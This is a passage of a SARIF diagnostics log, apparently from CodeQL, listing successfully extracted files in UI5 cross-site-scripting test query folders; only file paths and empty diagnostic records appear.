"toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 295 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 296 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 297 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 298 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 299 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 300 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 301 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 302 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 303 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 304 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 305 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 306 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 307 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 308 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 309 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 310 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 312 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 313 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 314 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 316 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 317 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 318 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 320 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 321 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 322 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 324 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 325 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 326 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 328 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 329 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 330 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 332 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 333 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 334 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 335 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 336 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 337 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 338 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 339 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 340 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 341 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 342 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", - "uriBaseId" : "%SRCROOT%", - "index" : 344 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 345 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 346 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 347 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 349 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 350 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 351 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 353 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 354 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 357 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : 